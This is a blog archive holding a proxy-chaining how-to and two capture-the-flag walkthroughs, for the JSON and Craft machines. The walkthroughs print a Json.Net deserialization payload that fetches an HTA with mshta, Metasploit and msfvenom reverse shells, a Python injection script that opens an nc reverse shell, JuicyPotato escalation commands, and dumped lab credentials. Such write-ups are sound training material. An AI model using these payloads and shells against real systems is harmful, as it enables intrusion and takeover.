Archive for the ‘How To’s’ Category

Posted: 2020/03/08 in How To's, Uncategorized
Tags: , , , ,

Duplex Proxy Setup

Below you will find instructions on how to setup a duplex proxy setup. Once you complete the walk-thru you will find it is very easy to add multiple proxies to your chain using the same technique shown here.

Here is a quick overview of the setup, we will be chaining both proxy servers together. This will allow us to leverage both tools during our web application testing with minimal effort.

Duplex Proxy Overview

Proxy 2: Zap Setup

First ensure you have ZAP installed. For Kali Linux this could be done with ‘apt-get install zaproxy’.

Once installed open Tools > Options


From the options menu find the Local Proxies section, and modify the Port number to something other than 8080. For our example we configure the port 8181 to setup our ZAP proxy.

Now save and exit Zap proxy to save these settings (this may not be required but I have found it best).


Now you can launch Zap proxy again and verify it is listening.

netstat -antpln | grep 8181
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp6       0      0          :::*                    LISTEN      23824/java
Proxy 1: Burp Setup

We launch Burp and edit the User options to add an Upstream Proxy Server. We use the same settings we used to configure our ZAP proxy. In this case we add an upstream proxy with port 8181


Browser Setup

Now we just need to setup our browser. For our example we will use Firefox with the Foxy Proxy plug-in.

You can find the plug-in here:

Once installed we setup Burp as a proxy using the port 8080


Now we should be able to browse to a resource in our browser and see the results processed by both Burp and Zap


Using this method you can chain more proxies together by simply adding an upstream proxy to Zap, wash and repeat as needed to chain as many as you wish. The only limitation is each proxy must allow upstream proxy settings.

Hope you enjoyed the tip, now get to testing all the things!


Posted: 2020/02/17 in How To's, Information Security
Tags: , ,

Walkthru for JSON.htb

This is a detailed walk-thru for JSON.htb written by dR1PPy


JSON was a very fun machine for attacking vulnerable serialization services. This challenge has a very real world feel and was a great overall experience. Much thanks to Cyb3rb0b for putting this challenge together, also for the clever nameplay based on the popular writeup of the attack.


Our NMAP reveals many of the standard services so we start enumeration on them.

Not much seen from the windows side.

_Received reply to probe NBTStat (target port 137) from_ 80f08400000000010000000020434b4141414141414141414141414141414141414141414141414141414141410000210001000000000065034a534f4e2020202020202020202020000400574f524b47524f55502020202020200084004a534f4e2020202020202020202020200400005056b9711e00000000000000000000000000000000000000000000000000000000000000000000000000000000

But our www enumeration reveals the following Javascript file.

It looks to contain data which we work to decode.

HTTP/1.1 200 OK
Content-Type: application/javascript
Last-Modified: Thu, 23 May 2019 18:50:23 GMT
Accept-Ranges: bytes
ETag: "342ed0609811d51:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Thu, 09 Jan 2020 05:12:08 GMT
Connection: close
Content-Length: 2357

var _0xd18f = ["\x70\x72\x69\x6E\x63\x69\x70\x61\x6C\x43\x6F\x6E\x74\x72\x6F\x6C\x6C\x65\x72", "\x24\x68\x74\x74\x70", "\x24\x73\x63\x6F\x70\x65", "\x24\x63\x6F\x6F\x6B\x69\x65\x73", "\x4F\x41\x75\x74\x68\x32", "\x67\x65\x74", "\x55\x73\x65\x72\x4E\x61\x6D\x65", "\x4E\x61\x6D\x65", "\x64\x61\x74\x61", "\x72\x65\x6D\x6F\x76\x65", "\x68\x72\x65\x66", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x6C\x6F\x67\x69\x6E\x2E\x68\x74\x6D\x6C", "\x74\x68\x65\x6E", "\x2F\x61\x70\x69\x2F\x41\x63\x63\x6F\x75\x6E\x74\x2F", "\x63\x6F\x6E\x74\x72\x6F\x6C\x6C\x65\x72", "\x6C\x6F\x67\x69\x6E\x43\x6F\x6E\x74\x72\x6F\x6C\x6C\x65\x72", "\x63\x72\x65\x64\x65\x6E\x74\x69\x61\x6C\x73", "", "\x65\x72\x72\x6F\x72", "\x69\x6E\x64\x65\x78\x2E\x68\x74\x6D\x6C", "\x6C\x6F\x67\x69\x6E", "\x6D\x65\x73\x73\x61\x67\x65", "\x49\x6E\x76\x61\x6C\x69\x64\x20\x43\x72\x65\x64\x65\x6E\x74\x69\x61\x6C\x73\x2E", "\x73\x68\x6F\x77", "\x6C\x6F\x67", "\x2F\x61\x70\x69\x2F\x74\x6F\x6B\x65\x6E", "\x70\x6F\x73\x74", "\x6A\x73\x6F\x6E", "\x6E\x67\x43\x6F\x6F\x6B\x69\x65\x73", "\x6D\x6F\x64\x75\x6C\x65"]; angular[_0xd18f[30]](_0xd18f[28], [_0xd18f[29]])[_0xd18f[15]](_0xd18f[16], [_0xd18f[1], _0xd18f[2], _0xd18f[3], function (_0x30f6x1, _0x30f6x2, _0x30f6x3) { _0x30f6x2[_0xd18f[17]] = { UserName: _0xd18f[18], Password: _0xd18f[18] }; _0x30f6x2[_0xd18f[19]] = { message: _0xd18f[18], show: false }; var _0x30f6x4 = _0x30f6x3[_0xd18f[5]](_0xd18f[4]); if (_0x30f6x4) { window[_0xd18f[11]][_0xd18f[10]] = _0xd18f[20] }; _0x30f6x2[_0xd18f[21]] = function () { _0x30f6x1[_0xd18f[27]](_0xd18f[26], _0x30f6x2[_0xd18f[17]])[_0xd18f[13]](function (_0x30f6x5) { window[_0xd18f[11]][_0xd18f[10]] = _0xd18f[20] }, function (_0x30f6x6) { _0x30f6x2[_0xd18f[19]][_0xd18f[22]] = _0xd18f[23]; _0x30f6x2[_0xd18f[19]][_0xd18f[24]] = true; console[_0xd18f[25]](_0x30f6x6) }) } }])[_0xd18f[15]](_0xd18f[0], [_0xd18f[1], _0xd18f[2], _0xd18f[3], function (_0x30f6x1, _0x30f6x2, _0x30f6x3) { var _0x30f6x4 = _0x30f6x3[_0xd18f[5]](_0xd18f[4]); if (_0x30f6x4) { _0x30f6x1[_0xd18f[5]](_0xd18f[14], { headers: { "\x42\x65\x61\x72\x65\x72": _0x30f6x4 } })[_0xd18f[13]](function (_0x30f6x5) { _0x30f6x2[_0xd18f[6]] = _0x30f6x5[_0xd18f[8]][_0xd18f[7]] }, function (_0x30f6x6) { _0x30f6x3[_0xd18f[9]](_0xd18f[4]); window[_0xd18f[11]][_0xd18f[10]] = _0xd18f[12] }) } else { window[_0xd18f[11]][_0xd18f[10]] = _0xd18f[12] } }])

We clean it up.

"7072696E636970616C436F6E74726F6C6C6572", "2468747470", "2473636F7065", "24636F6F6B696573", "4F4175746832", "676574", "557365724E616D65", "4E616D65", "64617461", "72656D6F7665", "68726566", "6C6F636174696F6E", "6C6F67696E2E68746D6C", "7468656E", "2F6170692F4163636F756E742F", "636F6E74726F6C6C6572", "6C6F67696E436F6E74726F6C6C6572", "63726564656E7469616C73", "", "6572726F72", "696E6465782E68746D6C", "6C6F67696E", "6D657373616765", "496E76616C69642043726564656E7469616C732E", "73686F77", "6C6F67", "2F6170692F746F6B656E", "706F7374", "6A736F6E", "6E67436F6F6B696573", "6D6F64756C65"

And decode it.

"principalController", "$http", "$scope", "$cookies", "OAuth2", "get", "UserName", "Name", "data", "remove", "href", "location", "login.html", "then", "/api/Account/", "controller", "loginController", "credentials", "", "error", "index.html", "login", "message", "Invalid Credentials.", "show", "log", "/api/token", "post", "json", "ngCookies", "module"

Looks like a controller which handles the login process.
From the look of the controller we are supposed to post our auth request in JSON format to the following URL.


Speaking of the login process we can clearly see it is broken as are able to see the homescreen for a second before we get redirected to the login page.
Seems to do some delayed validation on our token, maybe this is broken.

And since the name of the box is JSON, could it be that the JSON post is vulnerable?
So let’s just send a garbage post request.

An error has occurred.Object reference not set to an instance of an object.System.NullReferenceException at DemoAppExplanaiton.Controllers.AccountController.Login(Usuario login) in C:\Users\admin\source\repos\DemoAppExplanaiton\DemoAppExplanaiton\Controllers\AccountController.cs:line 24
at lambda_method(Closure , Object , Object[] )
at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass6_2.<GetExecutor>b__2(Object instance, Object[] methodParameters)
at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ExecuteAsync(HttpControllerContext controllerContext, IDictionary`2 arguments, CancellationToken cancellationToken)
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.Web.Http.Controllers.ApiControllerActionInvoker.<InvokeActionAsyncCore>d__1.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.Web.Http.Controllers.ActionFilterResult.<ExecuteAsync>d__5.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.Web.Http.Dispatcher.HttpControllerDispatcher.<SendAsync>d__15.MoveNext()

Now let's try to post a valid request.

POST /api/token HTTP/1.1
Host: json.htb
Connection: close
Content-Length: 39
Accept: application/json, text/plain, */*
Origin: https://json.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://json.htb/login.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9


We see we are given back an OAuth2 string that is encoded base 64.

HTTP/1.1 202 Accepted
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
Set-Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=; expires=Fri, 10-Jan-2020 07:39:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 10 Jan 2020 07:37:10 GMT
Connection: close
Content-Length: 0

After decoding we find the same JSON values we provided along with a few extra values.

{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}

We see the same cookie is provided a few requests later to access the accounts page.

GET /api/Account/ HTTP/1.1
Host: json.htb
Connection: close
Accept: application/json, text/plain, */*
Bearer: eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://json.htb/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=

So to recap we have found that we provide credentials, and are given those credentials back in an encoded format.
We then use that encoded token to authenticate with other pages.

I smell a deserialization attack here..
So we fuzz the fields we found around the login process.
And we find we are able to generate an error response when we fuzz the Bearer: field

GET /api/Account/ HTTP/1.1
Host: json.htb
Connection: close
Accept: application/json, text/plain, */*
Bearer: dR1PPy
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://json.htb/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=

Which spits out an error message with more info.

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 10 Jan 2020 09:07:30 GMT
Connection: close
Content-Length: 145

{"Message":"An error has occurred.","ExceptionMessage":"Cannot deserialize Json.Net Object","ExceptionType":"System.Exception","StackTrace":null}

And there we validate our possible exploit vector.
Our OAuth2 JSON token is being deserialized by the application, using the Json.Net deserializer.

After some web searching we find a tool that will help us generate some test payloads.

Lucky for us we find we don't even need to generate a payload as just modifying one of the examples allows us to test code execution.
We also run it thru a quick JSON formatter to fix some of the syntax from the example and end up with.

"$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"$type":"System.Collections.ArrayList, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"/c ping -n 5"
"$type":"System.Diagnostics.Process, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089"

We base64 encode our payload and send it as our Bearer value.

GET /api/Account/ HTTP/1.1
Host: json.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://json.htb/index.html
Bearer: ewogICAiJHR5cGUiOiJTeXN0ZW0uV2luZG93cy5EYXRhLk9iamVjdERhdGFQcm92aWRlciwgUHJlc2VudGF0aW9uRnJhbWV3b3JrLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNSIsCiAgICJNZXRob2ROYW1lIjoiU3RhcnQiLAogICAiTWV0aG9kUGFyYW1ldGVycyI6ewogICAgICAiJHR5cGUiOiJTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkiLAogICAgICAiJHZhbHVlcyI6WwogICAgICAgICAiY21kIiwKICAgICAgICAgIi9jIHBpbmcgLW4gNSAxMC4xMC4xNC4zMiIKICAgICAgXQogICB9LAogICAiT2JqZWN0SW5zdGFuY2UiOnsKICAgICAgIiR0eXBlIjoiU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkiCiAgIH0KfQ==
Connection: close
Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=

Despite an error returned from the web server the code is still executed.

sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
15:07:38.344611 IP json.htb > hostname: ICMP echo request, id 1, seq 16, length 40
15:07:38.344631 IP hostname > json.htb: ICMP echo reply, id 1, seq 16, length 40
15:07:39.350560 IP json.htb > hostname: ICMP echo request, id 1, seq 17, length 40
15:07:39.350599 IP hostname > json.htb: ICMP echo reply, id 1, seq 17, length 40
15:07:40.366236 IP json.htb > hostname: ICMP echo request, id 1, seq 18, length 40
15:07:40.366259 IP hostname > json.htb: ICMP echo reply, id 1, seq 18, length 40
15:07:41.384059 IP json.htb > hostname: ICMP echo request, id 1, seq 19, length 40
15:07:41.384093 IP hostname > json.htb: ICMP echo reply, id 1, seq 19, length 40
15:07:42.398531 IP json.htb > hostname: ICMP echo request, id 1, seq 20, length 40
15:07:42.398566 IP hostname > json.htb: ICMP echo reply, id 1, seq 20, length 40

Gaining Shell Access

Lets use our new execution method to get ourselves a quick shell.

use exploit/windows/misc/hta_server

Module options (exploit/windows/misc/hta_server):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST yes The local host to listen on. This must be an address on the local machine or
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 8080 yes The listen port

exploit -j -z
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on
msf5 exploit(windows/misc/hta_server) > [*] Using URL:

Now we use this URL in our attack.

"$type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"$type":"System.Collections.ArrayList, mscorlib, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"/c mshta.exe"
"$type":"System.Diagnostics.Process, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089"

We base64 encode our updated payload and send it.

GET /api/Account/ HTTP/1.1
Host: json.htb
Connection: close
Accept: application/json, text/plain, */*
Bearer: ewogICAiJHR5cGUiOiJTeXN0ZW0uV2luZG93cy5EYXRhLk9iamVjdERhdGFQcm92aWRlciwgUHJlc2VudGF0aW9uRnJhbWV3b3JrLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNSIsCiAgICJNZXRob2ROYW1lIjoiU3RhcnQiLAogICAiTWV0aG9kUGFyYW1ldGVycyI6ewogICAgICAiJHR5cGUiOiJTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkiLAogICAgICAiJHZhbHVlcyI6WwogICAgICAgICAiY21kIiwKICAgICAgICAgIi9jIG1zaHRhLmV4ZSBodHRwOi8vMTAuMTAuMTQuMzI6ODAvcHB6SGFlQ2pqbEp3Lmh0YSIKICAgICAgXQogICB9LAogICAiT2JqZWN0SW5zdGFuY2UiOnsKICAgICAgIiR0eXBlIjoiU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkiCiAgIH0KfQ==
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: https://json.htb/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=

And now we have a wonderful little shell 🙂

<br />[*] Server started.
[*] hta_server - Delivering Payload
[*] Sending stage (180291 bytes) to
[*] Meterpreter session 1 opened ( -> at 2020-01-10 15:44:00 -0700

Gaining Admin Access

During basic enumeration we find the host may be vulnerable to the potato PrivEsc attacks.
We find the "SeImpersonatePrivilege" is enabled for this user.

whoami /priv


Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

So let's try to exploit this using the Potato attack which takes advantage of this setting.

To use the potato attack we need to find a valid CLSID that will allow us to escalate.
We create a quick batch file to get the CLSID's from the target

New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT
Get-ItemProperty HKCR:\clsid\* | select-object AppID,@{N='CLSID'; E={$_.pschildname}} | where-object {$_.appid -ne $null}

Copy the output to our local machine for some syntax cleanup.

awk '{print $3}' > CLSID.list

Now we copy our list along with the test batch file to our target.

Soon we get output on some possible CLSID's to use for escalation
The increase in the 10000 value means previous CLSID is a valid target)

{00021401-0000-0000-C000-000000000046} 10000
{000C101C-0000-0000-C000-000000000046} 10000
{0010890e-8789-413c-adbc-48f5b511b3af} 10000
{00f2b433-44e4-4d88-b2b0-2698a0a91dba} 10000
{010911E2-F61C-479B-B08C-43E6D1299EFE} 10000
{0289a7c5-91bf-4547-81ae-fec91a89dec5} 10000 <<< Valid CLSID
{031EE060-67BC-460d-8847-E4A7C5E45A27} 10001
{0358b920-0ac7-461f-98f4-58e32cd89148} 10001
{6CF9B800-50DB-46B5-9218-EACF07F5E414} 10001 <<juicypotato -z -l 11000 -c {6CF9B800-50DB-46B5-9218-EACF07F5E414}
juicypotato -z -l 11000 -c {6CF9B800-50DB-46B5-9218-EACF07F5E414}
{6CF9B800-50DB-46B5-9218-EACF07F5E414};NT AUTHORITY\SYSTEM

So we generate our payload

msfvenom -p cmd/windows/reverse_powershell lhost= lport=8800 > 1.bat

Copy it over to the target and start our listener

nc -lvp 8800

Execute our escalation exploit

juicypotato -t * -l 32007 -p C:\Users\userpool\Downloads\1.bat -c {6CF9B800-50DB-46B5-9218-EACF07F5E414}

And get our Root Shell

listening on [any] 8800 ...
connect to [] from json.htb [] 50440
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

nt authority\system

Now sit back and twist your mustache and adjust your monocle cause you just owned JSON like a Sir!


Learn about Serialization/Deserialization attacks


OWASP Cheatsheet


JSON Web Token Decoder


JSON Formatter


Windows Reverse Shell One-Liners

Get Reverse-shell via Windows one-liner


Abusing Tokens for Windows Privilege escalation
Abusing Token Privileges For Windows Local Privilege Escalation


Juicy Potato


Posted: 2020/01/14 in How To's, htb

Walk-Thru for Craft.HTB


This is a detailed walk-thru for craft.htb written by dR1PPy


Overall the host has been graded with a fair rating.
The path to user is not simple, but there are not a lot of rabbit holes to find yourself trapped in.
The path to root was fairly easy if you can catch the clue fast enough.
This was one of those rare machines where I was able to get root access with no privesc scripts.

This machine helped with understanding how to attack python based applications, and working with API’s.
Much thanks to rotarydrone for the challenge!

. * .. . * *
* * @()Ooc()* o .
(Q@*0CG*O() ___
|\_________/|/ _ \
| | | | | / | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | \_| |
| | | | |\___/

Services Scan


host port proto name state info
---- ---- ----- ---- ----- ---- 22 tcp ssh open OpenSSH 7.4p1 Debian 10+deb9u5 protocol 2.0 443 tcp ssl/http open nginx 1.15.8 6022 tcp ssh open protocol 2.0

So looks like we are dealing with HTTPS & SSH, no UDP based services were found.

Getting User Access

After port scanning we start with a visit to the HTTPS website.
From here we see links to 2 other URL’s which we add to our /etc/hosts


Reviewing both URL’s reveals more information on possible paths to attack.

We are presented with an API which lists its variables in a friendly how to page.


And a private code repository


We explore the Gogs repos and find repository for the API which allows us to read the source code.

After reviewing the code we find some info on how it creates auth tokens.
What DB is being used and what a few test scripts to verify things.
We also find some user credentials which was removed in a previous commit.



We try the credentials for SSH but are unsuccessful. Let’s keep looking at the code.

We also notice from the issues page a weakness was reported around a parameter that allows unsanitized input.


Maybe we can use this method to gain access?

Looking again at the test script in which we found our credentials, and we notice it was written to test this specific issue.


So we download the test script and make a few minor modifications to get our attack moving.
We fight with our syntax for a bit but eventually get a shell back using the script below.

#!/usr/bin/env python

import requests
import json

response = requests.get('https://api.craft.htb/api/auth/login', auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
json_response = json.loads(response.text)
token = json_response['token']

headers = { 'X-Craft-API-Token': token, 'Content-Type': 'application/json' }

# make sure token is valid
response = requests.get('https://api.craft.htb/api/auth/check', headers=headers, verify=False)


# create a sample brew with real ABV... should succeed.
print("Attacking ABV Variable")
brew_dict = {}

# Payloads that have failed [ nc direct calls, wget calls, curl calls, direct /bin/bash calls ]
brew_dict['abv'] = '__import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 8088 >/tmp/f") & 0.15'

brew_dict['name'] = 'bullshit'
brew_dict['brewer'] = 'bullshit'
brew_dict['style'] = 'bullshit'

json_data = json.dumps(brew_dict)
response ='https://api.craft.htb/api/brew/', headers=headers, data=json_data, verify=False)


Ok now we have reverse shell and we see we are root user!?
But we don’t find any user or root flags and some basic commands are not available (dir?)
Could this be a virtual instance or restricted shell?

We quickly validate we are in a docker image.

cat /proc/1/cgroup

A quick enumeration of the Craft-API folder and we find an interesting settings file.

/ # find * | grep craft

And as suspected this file contains valuable data in the form of another set of credentials along with the CRAFT_API_SECRET.

# cat /opt/app/craft_api/
# Flask settings
FLASK_SERVER_NAME = 'api.craft.htb'
FLASK_DEBUG = False # Do not use debug mode in production

# Flask-Restplus settings

# database

Now we can use the script found in the Gogs repo to make use of our new credentials.
We see the cursor is set to select one row which really limits our scope, so we change that to select all rows.
Since nano is not available and vi is useless on this host we also modify the script to take command line variables for our SQL statements.

#!/usr/bin/env python

import pymysql

# test connection to mysql database

connection = pymysql.connect(host="db",

with connection.cursor() as cursor:
sql = sys.args[1]
result = cursor.fetchall()


A quick test verifies it is working as expected.

/tmp # python ./ "SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"
[{'id': 12, 'brewer': '10 Barrel Brewing Company', 'name': 'Pub Beer', 'abv': Decimal('0.050')}]

After some DB enumeration we find the info we are looking for with the following statement.

/tmp # python ./ "SELECT * from craft.user"

[{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}, {'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}, {'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}]

Now we have 3 sets of credentials for the API & possibly gogs

We try the credentials for gilfoyle in Gogs and we find another code repo.
This one seems to have some SSH keys stored in the .ssh directory.


We use the SSH key and the password to get SSH access to the host as gilfoyle.
From here we find our user flag.

Getting Root Access

Even before we start to enumerate the host something stands out.
A hidden token file is found the users home folder

ls -lha
total 36K
drwx------ 4 gilfoyle gilfoyle 4.0K Feb 9 2019 .
drwxr-xr-x 3 root root 4.0K Feb 9 2019 ..
-rw-r--r-- 1 gilfoyle gilfoyle 634 Feb 9 2019 .bashrc
drwx------ 3 gilfoyle gilfoyle 4.0K Feb 9 2019 .config
-rw-r--r-- 1 gilfoyle gilfoyle 148 Feb 8 2019 .profile
drwx------ 2 gilfoyle gilfoyle 4.0K Feb 9 2019 .ssh
-r-------- 1 gilfoyle gilfoyle 33 Feb 9 2019 user.txt
-rw------- 1 gilfoyle gilfoyle 36 Feb 9 2019 .vault-token
-rw------- 1 gilfoyle gilfoyle 2.5K Feb 9 2019 .viminfo
gilfoyle@craft:~$ cat .vault-token

A quick google search for the file name returns information on one time token system.
We confirm this token file is valid.

gilfoyle@craft:~$ vault token lookup f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
Key Value
--- -----
accessor 1dd7b9a1-f0f1-f230-dc76-46970deb5103
creation_time 1549678834
creation_ttl 0s
display_name root
entity_id n/a
explicit_max_ttl 0s
id f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
num_uses 0
orphan true
path auth/token/root
policies [root]
ttl 0s

So after doing some research on how to use vault to authenticate SSH we find the following method to gain root access.

vault ssh root@localhost
WARNING: No -role specified. Use -role to tell Vault which ssh role to use for
authentication. In the future, you will need to tell Vault which role to use.
For now, Vault will attempt to guess based on the API response. This will be
removed in the Vault 1.1.
Vault SSH: Role: "root_otp"
WARNING: No -mode specified. Use -mode to tell Vault which ssh authentication
mode to use. In the future, you will need to tell Vault which mode to use.
For now, Vault will attempt to guess based on the API response. This guess
involves creating a temporary credential, reading its type, and then revoking
it. To reduce the number of API calls and surface area, specify -mode
directly. This will be removed in Vault 1.1.
Vault could not locate "sshpass". The OTP code for the session is displayed
below. Enter this code in the SSH password prompt. If you install sshpass,
Vault can automatically perform this step for you.
OTP for the session is: 8a4176e6-63a8-819e-b21d-7d725e9755f8
. * .. . * *
* * @()Ooc()* o .
(Q@*0CG*O() ___
|\_________/|/ _ \
| | | | | / | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | | | |
| | | | | \_| |
| | | | |\___/

Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~# cat root.txt

And now that root is owned I have a strange urge to drink some craft beers!
Hope you enjoyed the write up!

Learning Resources Used for Reference in this Attack

